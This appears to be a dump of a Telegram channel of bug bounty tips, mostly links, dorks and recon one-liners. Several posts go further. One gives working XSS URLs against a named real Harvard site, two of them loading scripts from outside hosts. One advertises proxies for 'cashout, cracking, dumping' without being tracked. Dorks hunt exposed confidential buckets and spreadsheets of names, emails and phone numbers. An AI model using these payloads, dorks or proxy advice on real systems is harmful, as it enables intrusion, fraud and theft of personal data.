Bug bounty Tips

19 February 2025 09:52

🚨 CVE-2025-1094: PostgreSQL psql SQL injection
🔥PoC:https://github.com/rapid7/metasploit-framework/pull/19877
🧐Deep Dive :https://attackerkb.com/topics/G5s8ZWAbYH/cve-2024-12356/rapid7-analysis

👇Dorks:
HUNTER : protocol="postgresql"
FOFA : product="PostgreSQL"
SHODAN : "port:5432 PostgreSQL"

📰Refer:https://thecyberthrone.in/2025/02/15/cve-2025-1094-impacts-postgresql-with-sql-injection/

Bug bounty Tips

19 February 2025 09:52

⚡️One Million Dorks - A repository with text files containing a million dorks for finding potentially vulnerable web pages and sensitive data (in Google and other search engines). Can be used with various automation tools.

🎯https://github.com/HackShiv/OneDorkForAll/tree/main/dorks/1M_dork


#bugbounty #cybersecurity

Bug bounty Tips

11 February 2025 06:35

🚀Preparing for a Linux interview? Don't go in unprepared!

If you're looking for real-world, scenario-based Linux interview questions, this document is a goldmine. With 250 practical questions and answers, it covers everything from:

✔ Troubleshooting commands

File & process management

Networking & security configurations

System performance monitoringl

Scripting and automation

Whether you're an aspiring Linux admin, DevOps engineer, or security specialist, this resource will boost your confidence and sharpen your skills before your next interview.

Download the document below and start practicing!

#Linux #DevOps #SysAdmin #InterviewPreparation #TechCareers #LinuxCommands #ITJobs

Bug bounty Tips

11 February 2025 06:01

⚡️Exclusive Collection of Private Nuclei Templates

1. Akokonunes
2. Emadshanab
3. BoobooHQ
4. SirBugs
5. Linuxadi
6. 0xKayala
7. Bhataasim1
8. H0tak88r

Bug bounty Tips

08 February 2025 09:43

🔥 CRTO Aspirants & Red Teamers – Must-Check Resource!

⚡If you're preparing for the Certified Red Team Operator (CRTO) or want to refine your red teaming skills, this GitHub repo is a goldmine.

https://github.com/h3ll0clar1c3/CRTO

Bug bounty Tips

03 February 2025 08:46

Check this and give reaction

Bug bounty Tips

02 February 2025 17:29

https://x.com/Cipher0ps_tech/status/1886089478747652176?t=C06iwoofXZRrmEYaDdZEMQ&s=19

Bug bounty Tips

29 January 2025 07:08

🔖Essential Browser Extensions for Bug Bounty Hunters

⬇️FireFox

🔍 Link Gopher
🔍 Adblock Plus
🔍 FoxyProxy Standard
🔍 Video Speed Controller
🔍 Check XSS
🔍 HackTools
🔍 Bulk URL Opener
🔍 Temp Mail
🔍 JS Beautify CSS HTML
🔍 Multi-Account Containers

🌐

TruffleHog

🌐

Code Formatter

🌐

Freedium Extension

🌐

BuiltWith

🌐

Wappalyzer

🌐

WhatRuns

🌐

Retire.js

🌐

Cookie Extractor

🌐

Wayback Machine

🌐

EXIF Data Viwer

🌐

Shodan

🌐

S3 Bucket List

🌐

Ublock Origin

🌐

Resources Saver

🌐

Dot Git

🌐

EndPointer

Bug bounty Tips

28 January 2025 07:54

https://x.com/Cipher0ps_tech/status/1884132830747464168?t=dgFCLHP8SamEbKHR_UOyOw&s=35

Bug bounty Tips

22 January 2025 07:34

🖱Private Anonymous site For Residential Proxy 🖱

Link:- https://legionproxy.io/l/telegram

It offers
residential proxy,unlimited residential,datacenter proxies, ipv6 proxies and even static proxies at affordable rate you can use it in cashout, cracking,dumping and more

it's one of the best proxy service provider out there in whole market guyz even top pro spammer and cracker use it as it implement world class security for it proxies so you can use it without getting tracked

Posted by @BugSpy

Bug bounty Tips

15 January 2025 03:57

⚡Google Dorks - Cloud Storage:  site:http://s3.amazonaws.com "target[.]com" site:http://blob.core.windows.net "target[.]com" site:http://googleapis.com "target[.]com" site:http://drive.google.com "target[.]com" 

👉Find buckets and sensitive data.
Combine:

site:http://s3.amazonaws.com | site:http://blob.core.windows.net | site:http://googleapis.com | site:http://drive.google.com "target[.]com"

Add something to narrow the results: "confidential” “privileged" “not for public release”

✅ Credit- Mike Takahashi

Bug bounty Tips

15 January 2025 02:09

💻 All About Bug Bounty - Updated!
🔥https://github.com/daffainfo/AllAboutBugBounty

#BugBounty #bugbountytips

Bug bounty Tips

13 January 2025 13:42

🔖Tiny XSS Payloads - A collection of tiny XSS Payloads that can be used in different contexts.

➡️ The DEMO available here: 🔗 Link
📱 Github: 🔗 Link

Bug bounty Tips

08 January 2025 07:26

Haravard University 🎓

Bug : XSS


alert Bug 🤷‍♀️

https://bhi.fas.harvard.edu/?s=e%27%22()%26%25%3Czzz%3E%3CScRiPt%20%3Ealert(9155)%3C/ScRiPt%3E

https://bhi.fas.harvard.edu/?s=e%27%22()%26%25%3Czzz%3E%27%22%3E%3Cscript%20src=https://xss.report/c/{username}%3E%3C/script%3E

https://bhi.fas.harvard.edu/?s=e%27%22()%26%25%3Czzz%3E%27%22%3E%3Cscript%20src=https://jso-tools.z-x.my.id/raw/~/2FD8N5LJDAGNG%3E%3C/script%3E

Bug bounty Tips

08 January 2025 07:11

JWT attacks

https://juba-notes.notion.site/JWT-attacks-4f62b2b641a84032bc624f8e8432345d

Bug bounty Tips

19 February 2025 09:52

🔖Find hidden Endpoints:

javascript:(async function(){let scanningDiv=document.createElement("div");scanningDiv.style.position="fixed",scanningDiv.style.bottom="0",scanningDiv.style.left="0",scanningDiv.style.width="100%",scanningDiv.style.maxHeight="50%",scanningDiv.style.overflowY="scroll",scanningDiv.style.backgroundColor="white",scanningDiv.style.color="black",scanningDiv.style.padding="10px",scanningDiv.style.zIndex="9999",scanningDiv.style.borderTop="2px solid black",scanningDiv.innerHTML="<h4>Scanning...</h4>",document.body.appendChild(scanningDiv);let e=[],t=new Set;async function n(e){try{const t=await fetch(e);return t.ok?await t.text():(console.error(`Failed to fetch ${e}: ${t.status}`),null)}catch(t){return console.error(`Error fetching ${e}:`,t),null}}function o(e){return(e.startsWith("/")||e.startsWith("./")||e.startsWith("../"))&&!e.includes(" ")&&!/[^\x20-\x7E]/.test(e)&&e.length>1&&e.length<200}function s(e){return[...e.matchAll(/['"]((?:\/|\.\.\/|\.\/)[^'"]+)['"]/g)].map(e=>e[1]).filter(o)}async function c(o){if(t.has(o))return;t.add(o),console.log(`Fetching and processing: ${o}`);const c=await n(o);if(c){const t=s(c);e.push(...t)}}const l=performance.getEntriesByType("resource").map(e=>e.name);console.log("Resources found:",l);for(const e of l)await c(e);const i=[...new Set(e)];console.log("Final list of unique paths:",i),console.log("All scanned resources:",Array.from(t)),scanningDiv.innerHTML=`<h4>Unique Paths Found:</h4><ul>${i.map(e=>`<li>${e}</li>`).join("")}</ul>`})();

Bug bounty Tips

19 February 2025 09:52

👻👻👻Nuclei AI Prompts for @pdnuclei

Nuclei v3.3.9 (@pdiscoveryio) has -ai option to generate and run nuclei templates on the fly in natural language.

This is a list of prompts for this option:

- sensitive data exposure
- SQLi
- XSS
- SSRF

https://github.com/reewardius/Nuclei-AI-Prompts

Bug bounty Tips

11 February 2025 06:01

Want to learn more about Oauth bugs?

Here's a detailed writeup by @Doyensec on Oauth vulns like:

- Redirect Scheme Hijacking
- Scope Upgrade
- Client Confusion
- Mutable Claims

https://blog.doyensec.com/2025/01/30/oauth-common-vulnerabilities.html

#bugbounty #bugbountytips

Bug bounty Tips

08 February 2025 09:48

https://0xn3va.gitbook.io/

Bug bounty Tips

05 February 2025 08:04

https://x.com/Cipher0ps_tech/status/1887034544542396703?t=VR5I9yvHBD4G3DNAdWLMaQ&amp;s=35

Bug bounty Tips

03 February 2025 08:46

https://x.com/Cipher0ps_tech/status/1886320139223568875?t=00pP2DNgH2df_JHwQmUnGg&amp;s=35

Bug bounty Tips

29 January 2025 07:37

https://x.com/Cipher0ps_tech/status/1884490778371842240

Bug bounty Tips

29 January 2025 07:07

Extract all endpoints from a JS File and take your bug 🐞

✅Method one

waybackurls HOSTS | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?
15*[=: 1\5*[ '\"]?[^'\"]+.js[^'|"> ]*" | awk -F '/'
'{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh
-c "curl -k -s \"%)" | sed \"s/[;}\)>]/\n/g\" | grep -Po \" (L'1|\"](https?: )?[/1{1,2}[^'||l"> 1{5,3)|(\.
(get|post|ajax|load)\s*\(\5*['||\"](https?:)?[/1{1,2}[^'||\"> ]
{5,})\"" | awk -F "['|"]" '{print $2}' sort -fu

cat JS.txt | grep -aop "(?<=(\"|\'|' ))\/[a-zA-Z0-9?&=\/-#.](?= (\"||'|'))" | sort -u | tee JS.txt

Bug bounty Tips

23 January 2025 08:20

☄️IDOR Cheat Sheet
▶️https://jasper-join-7e5.notion.site/IDOR-Cheat-Sheet-9f7c9e3285bf4c7cae5ea38243cd0391

Bug bounty Tips

19 January 2025 14:29

Security Certification Roadmap

https://pauljerimy.com/security-certification-roadmap/

Bug bounty Tips

15 January 2025 02:09

⚡️LazyXss - Cross site scriptiong Testing Automation Tool v1.2

✅Link: github.com/iamunixtz/LazyXss

Bug bounty Tips

13 January 2025 13:42

OAuth 2.0 Authentication Misconfiguration
https://shellmates.medium.com/oauth-2-0-authentication-misconfiguration-dcb811062f1d

Bug bounty Tips

08 January 2025 07:31

site:target.com ext:xlsx "name" "@gmail.com" "phone"

Bug bounty Tips

08 January 2025 07:18

⛓ Easily Identify SSRF on a Website Using a Single Command*

This approach leverages a combination of powerful tools:

- Findomain: Gathers all subdomains related to the target site.
- Httpx: Verifies the accessibility of these domains.
- Getallurls (gau): Extracts URLs from sources like AlienVault OTX, Wayback Machine, and Common Crawl.
- Qsreplace: Substitutes query string values in URLs with a user-specified value.

Steps:
1. Install the mentioned tools.
2. Run the following command:

   findomain -t DOMAIN -q | httpx -silent -threads 1000 | gau | grep "=" | qsreplace your.burpcollaborator.net  
    

Bug bounty Tips

08 January 2025 06:50

🕷Network+ (Network+ N10-008 book by Mike Myers) Summery Part-09

📱 Chapter-9 Network Naming: 🔗 Link

🔗 Previous Chapter

💡Stay tuned for the next chapter—I’ll post it next Friday!

#CyberSecurity #bugbounty #Network #infosec
🔸🔸🔸🔸🔸🔸🔸🔸
⚡ Boost The Channel
🕷 T.me/Spider_Crew
🔸🔸🔸🔸🔸🔸🔸🔸